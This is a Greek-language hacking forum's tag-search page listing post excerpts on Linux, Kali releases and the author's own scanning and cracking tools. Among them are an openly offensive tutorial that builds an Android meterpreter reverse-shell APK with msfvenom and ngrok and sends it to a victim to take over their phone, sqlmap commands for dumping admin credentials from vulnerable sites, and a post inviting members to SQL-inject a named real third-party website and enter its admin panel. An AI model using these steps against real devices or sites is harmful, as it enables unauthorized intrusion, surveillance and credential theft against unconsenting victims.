Μετάβαση στο περιεχόμενο

Αναζήτηση στην κοινότητα

Εμφάνιση αποτελεσμάτων για τις ετικέτες 'linux'.

  • Αναζήτηση με βάση τις ετικέτες

    Πληκτρολογήστε τις ετικέτες και χωρίστε τες με κόμμα.
  • Αναζήτηση με βάση τον συγγραφέα

Τύπος περιεχομένου


Ενότητες

  • GreekHacking
    • Κανόνες & Ανακοινώσεις
    • Καλωσόρισμα νέων μελών
    • Προτάσεις / Βελτιώσεις
    • Νέα σχετικά με το Hacking/Security
    • Ασφάλεια & Προστασία Δεδομένων
    • Εκτός Θέματος
  • Leaks
    • Hacking Tutorials
    • Anonymity & Privacy / Ανωνυμία και Προστασία Προσωπικών Δεδομένων
    • Προγράμματα για Hacking / Hacking Programs
    • Cracking Οδηγοί & Πληροφορίες
    • Βιβλία σχετικά με το Hacking
    • Προγράμματα - High Quality downloads
    • E-Books
    • XXX Movies

Categories

  • Ορολογίες
  • Hacking για αρχάριους
  • Hacking για προχωρημένους
  • Mobile Hacking
  • Cracking Tutorials
  • Hacking Computers
  • Hacking Tutorials στα Αγγλικά
  • Tutorials for hacks
  • Διάφοροι Οδηγοί
    • Οδηγοί σχετικά με τα Linux
    • Οδηγοί για υπολογιστές
    • Οδηγοί σχετικά με τα Mac
    • Οδηγοί για κινητά
  • Hacking Tutorials στα Αγγλικά Copy

Categories

  • Hacking
  • Ιστοσελίδες/Server
  • Hardware
  • Windows

Βρείτε αποτελέσματα...

Βρείτε αποτελέσματα που...


Ημερομηνία δημιουργίας

  • Start

    End


Τελευταία ενημέρωση

  • Start

    End


Φιλτράρισμα με βάση τον αριθμό των...

  1. Chapters Getting started with GNU/Linux Detecting Linux distribution name and version Getting information on a running Linux kernel Shell Check Disk Space Getting System Information ls command File Compression with 'tar' command Services Managing Services Modifying Users LAMP Stack tee command Secure Shell (SSH) SCP GnuPG (GPG) Network Configuration Midnight Commander Change root (chroot) Package Managers Compiling the Linux kernel LinuxNotesForProfessionals.pdf
  2. Έκδοση Kali Linux 2023.3 • Internal Infrastructure (Εσωτερική υποδομή) • Kali Autopilot (Επίθεση Αυτοματισμού) • Νέα Tools (9 Νέα Εργαλεία) Νέα Εργαλεία Kali • calico - Εγγενής δικτύωση cloud και ασφάλεια δικτύου • Cri-tools - CLI και εργαλεία επικύρωσης για το Kubelet Container Runtime Interface • Hubble - Παρατηρησιμότητα δικτύου, υπηρεσιών και ασφαλείας για kubernetes με χρήση eBPF • ImHex - Ένα Hex Editor για αντίστροφους μηχανικούς, προγραμματιστές • Kustomize - Προσαρμογή των διαμορφώσεων YAML Kubernetes • Rekono - Πλατφόρμα αυτοματισμού που συνδυάζει διαφορετικά εργαλεία hacking για την ολοκλήρωση διεργασιών pentesting • rz-ghidra - Deep ghidra decompiler • unblob - Εξαγωγή αρχείων από κάθε είδους μορφλες • Villain - C2 Framework που μπορεί να κάνει handle πολλά reverse shells και να βελτιώσει την λειτουργικότητά τους Kali KERNEL έκδοση 6.3.7 Μαζί με τα νέα εργαλεία που προστέθηκαν έγιναν ενημερώσεις και σε κάποια libraries, σημαντικές και δευτερεύουσες εκδόσεις όπως: Greenbone, Humble, Impacket, jSQL, OWASP ZAP, Rizin, Tetragon, theHarvester, Wireshark και πολλά άλλα Αλλά δυστυχώς έπρεπε να ρίξουν πακέτα από το Kali: king-phisher - Το εργαλείο πλέον δεν διατηρείται από τον Author, Ενναλακτικά ελέγξτε το GoPhish ως αντικατάσταση Plecost - Το εργαλείο δεν λειτουργεί με την Python 3.11 και δεν υπάρχει απάντηση από τον Author, Για αντικατάσταση δοκιμάστε το WPScan Περισσότερες πληροφορίες εδώ: https://www.kali.org/blog/kali-linux-2023-3-release/ Download σε VM: https://www.kali.org/get-kali/#kali-installer-images
  3. Κλασσικά άλλο ένα update για το greekhacking. v1.2.8 αν και πλέον βρίσκεται στο 1.2.9, απλά επειδή άλλαξα κάτι μόνο εσωτερικά και δεν έχει αλλαγές που φαίνονται, τράβηξα το βίντεο στο 1.2.8. Δείτε λοιπόν πως είναι πλέον το πρόγραμμα μετά τα updates git clone https://github.com/MataGreek/greekhacking.git
  4. Το βιβλίο αποτελεί έναν αναλυτικό εργαστηριακό οδηγό (και όχι μόνο) για τους φοιτητές που παρακολουθούν το μάθημα "Εισαγωγή στα Λειτουργικά Συστήματα". Η φιλοσοφία του μαθήματος (με βάση τον νέο οδηγό σπουδών του τμήματος Μηχ. Πληροφορικής) είναι να εισάγει τον φοιτητή στις βασικές έννοιες των Λειτουργικών συστημάτων (διεργασίες, μνήμη, σύστημα αρχείων κτλ) μέσα από την χρήση του UNIX (Linux) και του shell. Σκοπός δεν είναι η εκμάθηση ενός πλήθους εντολών του Unix, αλλά η κατανόηση του τρόπου με τον οποίο οι εφαρμογές (εντολές) αλληλεπιδρούν μεταξύ τους και με τον πυρήνα του λειτουργικού συστήματος. Αυτό αναπόφευκτα γίνεται μέσα από την εκμάθηση κάποιων εντολών και του τρόπου λειτουργίας του κελύφους (shell) μέσα από τον προγραμματισμό στο κέλυφος. Με το πέρας του μαθήματος ο φοιτητής θα πρέπει να έχει κατανοήσει την φιλοσοφία λειτουργίας ενός λειτουργικού συστήματος (στην περίπτωσή μας το unix) όπως επίσης και να εξοικειωθεί με την χρήση των γραμμών εντολών (και όχι υποχρεωτικά με την χρήση γραφικών επιφανειών χρήσης και μεθόδων "drag & drop". Αποτελείται από: Εισαγωγή στα Λειτουργικά Συστήματα και το Unix Εισαγωγή στη χρήση του shell και σύνταξη εντολών Εισαγωγή στο σύστημα αρχείων shell wildcards για την διαχείριση των αρχείων Άδειες χρήσης συστήματος αρχείων Κανονικές Εκφράσεις (Regular Expressions) Διεργασίες, ανακατεύθυνση, διασωλήνωση, φίλτρα Εισαγωγή στα σενάρια φλοιού (bash) Ο επεξεργαστής vi Το αρχείο /etc/passwd και το /etc/group Εισαγωγή στα Λειτουργικά Συστήματα.pdf Πηγή: «Κάλλιπος»
  5. Καλησπέρα φόρουμ. Σήμερα είμαι αρκετά χαρούμενος μπορώ να πω διότι έχουν γίνει αρκετε΄ς αναβαθμίσεις στο πρόγραμμα που έχω φτιάξει για το Greek Hacking. Έκανα αλλαγές αυτόν τον καιρό και σήμερα κατάφερα να διορθώσω αρκετά bugs που είχε. Όσοι λοιπόν έχετε το πρόγραμμα, θα σας ζητηθεί Update στο version 1.2.4, ενώ όσοι δεν το έχετε μπορείτε να το κατεβάσετε από το link που θα σας βάλω από κάτω. Παρακαλώ ΜΟΝΟ για καλούς σκοπούς να χρησιμοποιηθεί το πρόγραμμα και όχι για παράνομο σκοπό. Όσοι έχετε το πρόγραμμα, σε αυτήν την περίπτωση πληκτρολογούμε Y ή yes για να γίνει το update. Έπειτα πρέπει να ανοίξετε και πάλι το πρόγραμμα για να πραγματοποιηθούν οι αλλαγές. Όσοι δεν το έχετε, θα πρέπει να τρέξετε πρώτα το αρχείο setup.py έτσι ώστε να κατεβούν όλα τα Requirements. Επίσης όσοι δεν έχετε την "pip" μην αγχώνεστε, θα κατεβεί αν τρέξετε το setup. Όσοι θέλετε βέβαια και δεν εμπιστεύεστε το setup.py μπορείτε να τρέξετε και το pip install -r requirements.txt. Αφού λοιπόν ανοίξουμε και πάλι το πρόγραμμα, πρέπει να βεβαιωθούμε πως τα version είναι ακριβώς τα ίδια. Έπειτα μπορείτε να χρησιμοποιήσετε το πρόγραμμα κανονικότατα. Από κάτω σας βάζω και μία εικόνα του virustotal. Virus total Link: https://www.virustotal.com/gui/file/4aafe52c17c622d2c97c3bd1058e4b712f5577d8add2eb369b54e3007b2c4a9a?nocache=1 Download program: https://github.com/MataGreek/greekhacking Terminal: git clone https://github.com/MataGreek/greekhacking.git Commands to run before open the program: python3 setup.py or if you have pip installed, pip install -r requirements.txt python3 greekhacking.py
  6. [Greekhacking program V1.1.8] ######################## Νέα ενημέρωση στο πρόγραμμά μου. Έκδοση 1.1.8. Δεν έχω κάνει τρελή αλλαγή απλά το βρήκα καλό να προσθέσω κάτι, συγκεκριμένα στο Password Generator. Όσοι έχετε το πρόγραμμά μου γνωρίζετε πως όταν ανοίγει σας ζητάει να επιλέξετε έναν αριθμό για να ανοίξετε το αντίστοιχο πρόγραμμα. Στο νούμερο 4 λοιπόν που βρίσκεται το Password Generator έγιναν αλλαγές. Τι άλλαξε; ######## Το Password Generator για όσους δεν ξέρετε σου κάνει generate έναν τυχαίο κωδικό με σύμβολα, κεφαλαίους, μικρούς χαρακτήρες και αριθμούς έτσι ώστε να είναι ασφαλής. Όμως επέλεξα να το κάνω ακόμα πιο ασφαλή. Έβαλα το πρόγραμμα να ρωτάει αν θέλετε να κρυπτογραφήσετε τον κωδικό που σας έκανε generate γρήγορα και απλά. Απλά απαντάτε ένα "Yes" και θα σας βγάλει τον κωδικό που σας δώθηκε κρυπτογραφημένο. Για περισσότερες πληροφορίες και εξήγηση στείλτε μήνυμα Πάρτε ένα παράδειγμα στην παρακάτω εικόνα. Κατεβάστε το πρόγραμμα εδώ: https://github.com/MataGreek/greekhacking VIRUS TOTAL ΕΧΩ ΒΑΛΕΙ ΣΤΗΝ ΠΡΩΤΗ ΜΟΥ ΑΝΑΡΤΗΣΗ ΟΤΑΝ ΠΑΡΟΥΣΙΑΣΑ ΤΟ ΠΡΟΓΡΑΜΜΑ. ΠΑΡΑΚΑΛΩ ΤΣΕΚΑΡΕΤΕ ΤΗΝ
  7. Καλησπέρα forum. Για να δούμε ποιος είναι ο δυνατός Θα το κάνουμε συχνά. Το θέμα θα λέγεται HACK ME IF YOU CAN και θα σας βάζω να κάνετε διάφορα challenges Πάμε να κάνουμε ένα challenge. Έχω σπάσει μια βάση και θέλω να προσπαθήσετε και εσείς να την σπάσετε. Θα σας δώσω ευπαθής σελίδα για να δούμε ποιος μπορεί να μπει με sqli. Θέλω να βρείτε την βάση, να βρείτε τα σωστά tables και columns που αντιστοιχούν στα στοιχεία σύνδεσης τον χρηστών και να τραβήξετε screenshot και να το ποσταρετε απο κατω στα σχολια αν τα καταφέρετε. Όποιος μπορεί ας μπει και στο panel και ας στείλει photo. Για πάμε ΕΥΠΑΘΗΣ ΣΕΛΙΔΑ http://www.etwinning.gr/various/webexreg.php?id=48
  8. Καλησπέρα φόρουμ! Σήμερα είμαι αρκετά χαρούμενος γιατί έγινε κάτι που δεν περίμενα να γίνει. Το πρόγραμμα αναβαθμίστηκε. Τι άλλαξε; ####### Πλέον το πρόγραμμα σας δείχνει το Version που ήδη έχετε και το Version που πρέπει να έχετε. Δηλαδή αν το πρόγραμμα είναι up to date. Αν δεν είναι up to date, σας ρωτάει αν θέλετε να κάνετε την αναβάθμιση που είναι διαθέσιμη. Αν εσείς λοιπόν επιλέξετε Ναι, προφανώς θα γίνει το Update. Το έψαχνα πριν καν φτιάξω το πρόγραμμα για το πως μπορώ να κάνω και τους υπόλοιπους να δέχονται τα updates, και τελικά έγινε έτσι όπως ήθελα. Μπορείτε να το χρησιμοποιήσετε ελεύθερα! Σχετικά με το Virus Total έχω ανεβάσει εικόνα στο προηγούμενο θέμα που είχα φτιάξει για το πρόγραμμα. Αν δεν το έχετε δει, παρακαλώ πηγαίντε και δείτε το για να καταλάβετε την χρήση του προγράμματος: Download: https://github.com/MataGreek/greekhacking
  9. Καλημέρα / καλησπέρα φόρουμ. Άλλο ένα νέο προγραμματάκι από εμένα και αυτήν την φορά ένα Admin Panel finder. Πάμε να δούμε πληροφορίες. Ή μάλλον πρίν δούμε, θα σας δείξω ότι δεν περιέχει κάτι κακόβουλο εσωτερικά για να μην έχετε και το άγχος. \ Τώρα που το τσεκάραμε και αυτό πάμε να δούμε το πρόγραμμα. Αρχικά το έφτιαξα αρκετά απλό όπως και τα προηγούμενα. Απλά το ανοίγετε, γράφετε το url και γίνεται το Scan. Πάμε να δούμε Εδώ βλέπουμε ότι έχω βάλει το url (κρυμμένο) και μας ενημερώνει το πρόγραμμα τι ώρα άρχισε το scan. Αμέσως μετά αρχίζει να τρέχει ένα Wordlist το οποίο εννοείται πως μπορείτε να το επεξεργαστείτε και να βάλετε και εσείς μέσα ότι θέλετε και εννοείται πως για να ξεχωρίζουμε το σωστό το οποίο μας δίνει status 200 το έχω βάλει με πράσινα και [+]... Και αυτά που είναι error 404 τα έχω βάλει με κόκκινα και [-]... Στο τέλος επίσης σας ενημερώνει τι ώρα τελείωσε το scan. Τώρα θέλω να σας πω λίγο για τα Requirements. 1.) Πρέπει αναγκαστικά να έχετε την τρίτη έκδοση της Python. Δηλαδή όχι python2 αλλά python3. 2.) Με το που ανοίξετε τον φάκελο με το πρόγραμμα, θα κατεβάσετε το requirements.txt γράφοντας την εντολή " pip install requirements.txt ". Αν έχετε κάποιο πρόβλημα γενικά με το πρόγραμμα παρακαλώ ενημερώστε με για να φτιαχτεί. Ευχαριστώ GitHub: https://github.com/MataGreek/GHADM
  10. Πολλοί έχουν την περιέργια να μάθουν πως παραβιάζεται ένα κινητό, πως γίνεται να ανοίξουν την κάμερα μας και να μας βλέπουν, πως γίνεται να δουν την ακριβής τοποθεσία μας μέσα από το κινητό μας, και πολλά άλλα. Σε αυτό το Post λοιπόν θα μάθουμε πως γίνεται αυτό, αλλά πριν αρχίσουμε, να πω ότι η ασφάλεια πλέον έχει αναβαθμιστεί οπότε το antivirus τον προηδοποιεί τον χρήστη στον οποίο κάνετε την επίθεση ότι πρόκειται για κάποιου είδους Trojan (Δούριος ίππος). Επίσης να προσθέσω ότι το λειτουργικό σύστημα που θα χρησιμοποιηθεί γι αυτήν την επίθεση είναι Linux. Συγκεκριμένα το Kali. Θα χρησιμοποιήσουμε τα εξής: msfvenom, msfconsole, ngrok, apache, https://www.gofile.io Το ngrok είναι αυτό το οποίο θα μας βοηθήσει να έχουμε απομακρυσμένη πρόσβαση στην συσκευή του θύματος. Αν δεν θέλετε να κατεβάσετε το ngrok μπορείτε να κάνετε forward την port σας, φτιάχνοντας τις ρυθμίσεις εσωτερικά του ρούτερ σας. Πάμε λοιπόν να ανοίξουμε το ngrok, γράφοντας ./ngrok tcp 8080 στο terminal μας. Για αρχή, θα πρέπει να φτιάξουμε το λεγόμενο Payload. Δηλαδή τον "ιο" ο οποίος θα εισβάλει μέσα στην συσκευή του θύματος και θα μας δώσει τις απαραίτητες δυνατότητες για να μπορέσουμε να διαχειρηστούμε την συσκευή. Για να το φτιάξουμε αυτό θα χρειαστούμε το msfvenom. msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R> /var/www/html/greekhacking.apk Στο msfvenom γράφουμε τις παραπάνω εντολές. Θα χρησιμοποιήσουμε λοιπόν το android/meterpreter/reverse_tcp, LHOST θα βάλουμε το tcp που μας δίνει το ngrok και LPORT αυτό επίσης που μας δίνεται στο ngrok. Μετά θα γράψουμε R > /var/www/html/ για να βάλουμε το αρχείο στην θέση /var/www/html/ και θα δώσουμε όνομα στο αρχείο μας. (π.χ greekhacking.apk). Αφού το κάνουμε αυτό λοιπόν πατάμε enter και το αρχείο μας είναι έτοιμο. Μετά ανοίγουμε ένα άλλο Terminal και ξεκινάμε το service apache. Γράφουμε λοιπόν service apache2 start και για να τσεκάρουμε αν όντως λειτουργεί, γράφουμε την εντολή service apache2 status. Όταν το κάνουμε αυτό, ανοίγουμε ένα άλλο Terminal στο οποίο θα ξεκινήσουμε την επίθεση. το msfconsole Τώρα θα πάμε στο https://www.gofile.io για να ανεβάσουμε το αρχείο που φτιάξαμε πριν από το msfvenom. Όταν ανεβάσουμε το αρχείο, επιστρέφουμε στο msfconsole και γράφουμε την εντολή use multi/handler Μετά τα εξής: set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 8080 Το LPORT μπαίνει αναλόγως με το τι port είχαμε βάλει στο ngrok στην αρχή. Εγώ είχα γράψει ./ngrok tcp 8080. Εσείς μπορείτε να βάλετε 4444. Αφού τελειώσουμε και με αυτό, στέλνουμε το Link με το αρχείο που ανεβάσαμε πρίν για να το κατεβάσει το θύμα στην συσκευή του. Και γράφουμε στο Τερμιναλ exploit. Εδώ περιμένουμε να εγκαταστήσει το θύμα την εφαρμογή και να την ανοίξει. Όταν λοιπόν την ανοίξει θα μας δώσει πρόσβαση στην συσκευή του ανοίγοντας κάποια sessions. Αφού ανοίξει τα sessions, είμαστε έτοιμοι. Είμαστε μέσα στην συσκευή του θύματος και μπορούμε να εκτελέσουμε εντολές. Επειδή όμως δεν ξέρουμε τι εντολές μπορούμε να εκτελέσουμε, θα γράψουμε το command "help" έτσι ώστε να μας βγάλει μία ολόκληρη λίστα με τα απαραίτητα. Η ανάρτηση αυτή είναι καθαρά για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη για το πως θα το χρησιμοποιήσετε. Για οποιαδήποτε ερώτηση κάντε σχόλιο.
  11. Το Greek Hacker MD5 HASH CRACKER είναι ένα πρόγραμμα αποκρυπτογράφησης, δημιουργήθηκε για νόμιμες ενέργειες και η ομάδα του Greek Hacking δεν φέρει καμία ευθύνη για το πως θα το χρησιμοποιήσετε. Πριν αρχίσουμε να αναφέρω πως έχει δύο εκδόσεις. Μία για Windows και μία για Linux και αυτός είναι και ο σκοπός των δύο φακέλων που θα δείτε στο Github. Όσοι έχετε Windows μπείτε στον φάκελο windows και όσοι Linux στον φάκελο Linux. Και που ξέρουμε αν τα προγράμματα που φτιάχνεις και μας δίνεις δεν έχουν ιούς; Καλή ερώτηση και πολύ εύκολη να απαντηθεί. Πρώτον δεν έχω κανέναν σκοπό να βλάψω καμία μηχανή και κανένα σύστημα, δεύτερον υπάρχει το VirusTotal που θα βάλω screenshot από κάτω, και τρίτο και σημαντικότερο... Μόνο ηθικό hacking. Ας αρχίσουμε. VIRUS TOTAL SCREENSHOT ----------------------------------------- PROGRAM SCREENSHOTS ----------------------------------------- Πρώτα απ' όλα ας αρχίσουμε με το τι βλέπουμε με το που κατεβάσουμε το πρόγραμμα. Έχω χωρίσει 3 φακέλους (Windows, Linux, Wordlist). Τους πρώτους δύο τους αναλύσαμε πιο πάνω. Στον φάκελο Wordlist υπάρχει μία ΜΙΚΡΗ wordlist προς το παρόν που έφτιαξα για εσάς, για να μην κατεβάζετε αν δεν έχετε ή για να μην γράφετε εσείς. INSTALL Η εγκατάσταση δεν είναι τίποτα άλλο παρα μόνο να γράψετε αυτήν την εντολή: pip install -r requirements.txt Με αυτήν την εντολή θα κατεβάσετε όλα τα προαπαιτούμενα για να ανοίξει το πρόγραμμα. Αμέσως μετά θα μπείτε στον φάκελο Linux ή Windows και θα ανοίξετε το πρόγραμμα γράφοντας: python3 ghmd5cracker.py USAGE Αφού το ανοίξετε θα σας πει να βάλετε το path του wordlist. Οπότε βάζετε το path χωρίς να βάλετε σύμβολα όπως, "" ή '' Όταν βάλετε σωστά το path θα πρέπει να βάλετε το md5 hash που θέλετε να αποκρυπτογραφήσετε. Μετά το πρόγραμμα θα ψάχνει από μόνο του για να αποκρυπτογραφήσει τον κωδικό. Ευχαριστώ Download ==> https://github.com/MataGreek/GH-MD5-CRACKER git clone https://github.com/MataGreek/GH-MD5-CRACKER.git Αν θέλετε να στηρίξετε την δουλειά μου παρακαλώ κάντε ένα Donate εδώ: https://www.paypal.com/paypalme/vbourant
  12. Καλησπέρα στον κόσμο του φόρουμ μας Σήμερα θα ήθελα να σας παρουσιάσω ένα πρόγραμμα που έφτιαξα με την γλώσσα Python και αυτό είναι ένα από Port Scanner. Τι κάνει το Port Scanner? Σκανάρει για ανοιχτές πόρτες ή θύρες (όπως θέλετε πείτε το) ενός Website. Πάμε να δούμε πως λειτουργεί λοιπόν. Αρχικά θα σας βάλω σε Screenshot το σκαν που έκανε το VirusTotal για να σας επαληθεύσω ότι δεν έβαλα μέσα κάποιον ιό. Ωραία. Τώρα που το επαληθεύσαμε πάμε να ξεκινήσουμε. Για αρχή, να πω ότι ο οδηγός είναι πάρα πολύ απλός και δεν χρειάζεται να κάνετε απολύτως τίποτα παρά μόνο να γράψετε αυτήν την εντολή "python3 GHPortScanner.py" Αφού όμως έχετε μπει στους σωστούς φακέλους οι οποίοι είναι "cd GHPortScanner/" και "cd GHPortScanner-v1.1" Με το που ανοίξει το πρόγραμμα θα σας εμφανίσει το "Enter the Host Here:" Εσείς εκεί θα βάλετε το Website το οποίο θέλετε να σκανάρετε. (Όχι την IP, βάλτε απλά το όνομα της ιστοσελίδας) Ας πάρουμε παράδειγμα το φόρουμ μας. Βλέπουμε ότι μας έχει βρει την IP της ιστοσελίδας που βάλαμε η οποία είναι 172.67.177.36 και περιττώ να πω ότι εδώ υπάρχει ένα προβληματάκι το οποίο μακάρι να το έχω λύσει στο επόμενο Version του προγράμματος... Είναι ΑΡΚΕΤΑ αργό στο να βρεί τα αποτελέσματα ανοιχτών Port. Συγγνώμη γι αυτό θα βρω τον τρόπο. Οπότε... Will take sometime, go get a coffee Βλέπουμε ότι βρήκε ανοιχτή την πόρτα 80. Εκεί το σταμάτησα γιατί το άνοιξα μόνο και μόνο για να σας δείξει πως λειτουργεί. Αν θέλετε να βγείτε από το πρόγραμμα, πατήστε απλά CTRL+C και αμέσως θα σας εμφανίσει την λέξει Exiting...... Που σημαίνει ότι το πρόγραμμα τερματίζεται. Το πρόγραμμα μπορείτε να το κατεβάσετε από το Github αλλά θα σας έχω και αρχείο στο MediaFire. Ευχαριστώ Για οποιοδήποτε πρόβλημα προκήψει, μην διστάσετε να γράψετε σχόλιο. Mediafire Download: https://www.mediafire.com/file/lkp6zrh1iodn7v9/GHPortScanner.zip/file Github Download: https://github.com/MataGreek/GHPortScanner command για να το κατεβάσετε σε Linux... git clone https://github.com/MataGreek/GHPortScanner.git ΠΡΟΣΟΧΗ: ΝΑ ΒΑΖΕΤΕ ΤΟ ΣΩΣΤΟ HOST NAME ΚΑΙ ΝΑ ΕΧΕΤΕ ΣΥΝΔΕΣΗ ΤΟ ΙΝΤΕΡΝΕΤ ΑΛΛΙΩΣ ΤΟ ΠΡΟΓΡΑΜΜΑ ΔΕΝ ΘΑ ΛΕΙΤΟΥΡΓΗΣΕΙ ΚΑΙ ΘΑ ΣΑΣ ΠΕΤΑΞΕΙ ΑΥΤΟ ΤΟ ΜΗΝΥΜΑ: "Error: Could not find the HOST. (Check your internet connection or your input is wrong)"
  13. Καλημέρα/Καλησπέρα φόρουμ. Την προηγούμενη φορά στην ανάρτησή μου, είχα δείξει πως κάνουμε sql injection με Windows. Σήμερα θα δούμε πως κάνουμε το ίδιο και σε Linux απλά και εύκολα. Για αρχή, πρέπει να έχουμε επιλέξει τον στόχο μας και αν θυμάστε στην προηγούμενη ανάρτηση είχαμε πει πως καταλαβαίνουμε αν είναι ευπαθής η σελίδα. Αν δεν θυμάστε πηγαίντε πρώτα διαβάστε την προηγούμενη ανάρτηση και μετά ελάτε εδώ. Αφού λοιπόν έχουμε επιλέξει τον στόχο μας, ανοίγουμε το Terminal (Το τερματικό) του Linux μας. ΕΚΕΙ ΓΡΑΦΟΥΜΕ ΤΟΝ ΕΞΗΣ ΚΩΔΙΚΑ sqlmap -u "Ο ΣΤΟΧΟΣ" --dbs Αφού λοιπόν πατήσουμε Enter, αυτό θα προσπαθήσει να ψάξει για την βάση, ή μάλλον τις βάσεις δεδομένων που έχει η ιστοσελίδα. Δείτε παρακάτω ΟΤΑΝ ΤΕΛΕΙΩΣΕΙ ΤΟ SCAN ΘΑ ΜΑΣ ΔΕΙΞΕΙ ΤΑ ΕΞΗΣ Μας εμφανίζει τις βάσεις και προφανώς εμείς κάτι θα πρέπει να τις κάνουμε. Θα πρέπει να γράψουμε έναν κώδικα έτσι ώστε να δώσουμε εντολή για το ΠΟΙΑ βάση να ψάξει και ΤΙ να ψάξει μέσα σε αυτήν. Αναλυτικά γράφεται ο παρακάτω κώδικας sqlmap -u "Ο ΣΤΟΧΟΣ" -D (ΤΟ --DBS ΤΟ ΑΛΛΑΖΟΥΜΕ ΣΕ -D ΔΗΛΑΔΗ -DATABASE) "Η ΒΑΣΗ" --tables (ΤΑ TABLES ΠΟΥ ΘΑ ΜΑΣ ΟΔΗΓΗΣΟΥΝ ΣΤΑ COLUMNS) Αμέσως μετά, θα μας εμφανίσει μία ολόκληρη λίστα από τα Tables. Κάπως έτσι Καλό ε; Δεν τελειώσαμε ακόμα όμως μάγκες μου. Πρέπει να βρούμε και τα Columns τα οποία βρίσκονται μέσα στο Table που θα επιλέξουμε. Για να βρούμε τα Columns, γράφουμε τον παρακάτω κώδικα Ο ΚΩΔΙΚΑΣ ΓΙΑ ΝΑ ΒΡΟΥΜΕ ΤΑ COLUMNS sqlmap -u "Ο ΣΤΟΧΟΣ" -D (ΤΟ --DBS ΤΟ ΑΛΛΑΖΟΥΜΕ ΣΕ -D ΔΗΛΑΔΗ -DATABASE) "Η ΒΑΣΗ" -T (Το table. π.χ Admin) --columns (για να βρουμε τα columns) Όπως καταλάβατε, όταν θέλουμε να δηλώσουμε κάτι, στην προκειμένη περίπτωση την βάση και τα tables, βάζουμε μόνο το πρώτο γράμμα με κεφαλαίο και με μία παυλίτσα (π.χ --dbs = -D, --tables = -T, --columns = -C). Αφού βρεί τα columns θα μας τα εμφανίσει κάπως έτσι. ΤΑ COLUMNS Τώρα αφού μας εμφάνισε τα Columns, πάμε να βρούμε το όνομα χρήστη και τον κωδικό του διαχειρηστή της ιστοσελίδας. Στην προκειμένη περίπτωση τα ονόματα είναι «user_name» «password». Γράφουμε λοιπόν τον παρακάτω κώδικα Ο ΚΩΔΙΚΑΣ ΓΙΑ ΝΑ ΕΜΦΑΝΙΣΟΥΜΕ ΤΑ ΑΠΟΤΕΛΕΣΜΑΤΑ sqlmap -u "Ο ΣΤΟΧΟΣ" -D (ΤΟ --DBS ΤΟ ΑΛΛΑΖΟΥΜΕ ΣΕ -D ΔΗΛΑΔΗ -DATABASE) "Η ΒΑΣΗ" -T (Το table. π.χ Admin) -C user_name,password(Τα columns μας) --dump (dump = για να εμφανίσει τα αποτελέσματα) Είμαστε έτοιμοι για να μας βγάλει τα αποτελέσματα που επιλέξαμε, δηλαδή τα ονόματα χρήστη και τους κωδικούς των διαχειρηστών. Δείτε την παρακάτω εικόνα! ΤΑ ΑΠΟΤΕΛΕΣΜΑΤΑ Τέλεια! Τώρα αν γνωρίζουμε το Admin Login από το οποίο συνδέεται ο διαχειρηστής, πάμε και κάνουμε σύνδεση (Δεν φέρω καμία ευθύνη για τις πράξεις σας, καλό θα ήταν να μην το χρησιμοποιήσετε για κακό σκοπό) Ευχαριστώ 🙂
  14. Οι περισσότεροι από εδώ ασχολείστε πάρα πολύ με Windows διότι μπορεί να μην γνωρίζετε, να μην θέλετε ή να μην έχετε όρεξη να ασχοληθείτε με κάποιο άλλο λειτουργικό σύστημα. Εγώ όμως θα σας προτείνω κάτι καλό. Το Linux. Συγκεκριμένα εγώ χρησιμοποιώ το Kali Linux γιατί έχει πολλά Hacking tools και σε βοηθάει να ενισχύσεις τις γνώσεις σου και ίσως κάποια στιγμή φτιάξεις και το δικό σου εργαλείο και να το ανεβάσεις και εσύ στο GITHUB. Έχει πάρα πολλά πράγματα να κάνεις μέσα το Kali που εννοείται πως ούτε εγώ ο ίδιος τα ξέρω όλα διότι ακόμα πειραματίζομαι. Πάμε να δούμε λοιπόν από που μπορούμε να το κατεβάσουμε αν λειτουργούμε με Windows. ΕΓΚΑΤΑΣΤΑΣΗ Για αρχή χρειαζόμαστε μία εικονική μηχανή (π.χ virtualbox). Το virtualbox σου δίνει την δυνατότητα να τρέξεις κάποιο άλλο λειτουργικό σύστημα εικονικά στον υπολογιστή σου. Πάμε να δούμε πως κατεβαίνει αυτό. Πατήστε αυτό εδώ το LINK: https://www.virtualbox.org/wiki/Downloads . Με το που το πατήσετε θα σας εμφανίσει εδώ Δεν θέλει πολύ σκέψη, σας έχω ζωγραφίσει με αγκύλη το που πρέπει να πάτε. Επιλέγουμε λοιπόν το λειτουργικό μας σύστημα (Windows οι περισσότεροι) Αμέσως μετά θα αρχίσει να κατεβαίνει αυτόματα το virtualbox και μετά κάνουμε το απλό install. (Δεν θα κανω το install γιατι εγω εχω ήδη το virtualbox) Οπότε προχωράμε στο επόμενο βήμα. Πάμε τώρα να κατεβάσουμε ένα αρχείο ISO για το kali linux. Για να το κατεβάσετε πατήστε αυτό το LINK: https://www.kali.org/downloads/ . ΟΤΑΝ ΑΝΟΙΞΕΤΕ ΤΟ LINK ΘΑ ΣΑΣ ΠΕΤΑΞΕΙ ΕΔΩ Τώρα πρέπει να επιλέξουμε έναν τρόπο να κατεβάσουμε το ISO. Σας προτείνω να επιλέξετε το πρώτο που λέει installer διότι το Live αν δεν κάνω λάθος τρέχει σε usb και διαγράφεται ότι έχεις αποθηκεύσει μετά (Μίας χρήσης δηλαδή. Διορθώστε με αν κάνω λάθος). Αφού κατεβεί το αρχείο, ανοίγουμε το virtualbox. ΟΔΗΓΙΕΣ Αφού τελειώσετε αυτά τα βήματα, Μετά πρέπει να φτιάξετε τις ρυθμίσεις. Ακολουθήστε προσεκτικά. ΡΥΘΜΙΣΕΙΣ ΠΡΟΣΟΧΗ! ΣΤΗΝ ΠΑΝΩ ΕΙΚΟΝΑ ΕΠΙΛΕΞΑΜΕ «CHOOSE A DISK FILE» ΠΑΤΟΝΤΑΣ ΤΟ ΔΙΣΚΑΚΙ Αμέσως μετά ακολουθεί η εγκατάσταση του Linux. Οπότε επειδή είναι αρκετή, θα σας αφήσω ένα βίντεο το οποίο θα σας βοηθήσει. Καλή επιτυχία και καλή αρχή στο νέο λειτουργικό σας🙂 ΚΑΝΤΕ ΤΟ SKIP ΜΕΧΡΙ ΤΟ 8:18 ΔΙΟΤΙ ΚΑΝΑΜΕ ΜΑΖΙ ΤΑ ΒΗΜΑΤΑ ΤΑ ΠΡΟΗΓΟΥΜΕΝΑ
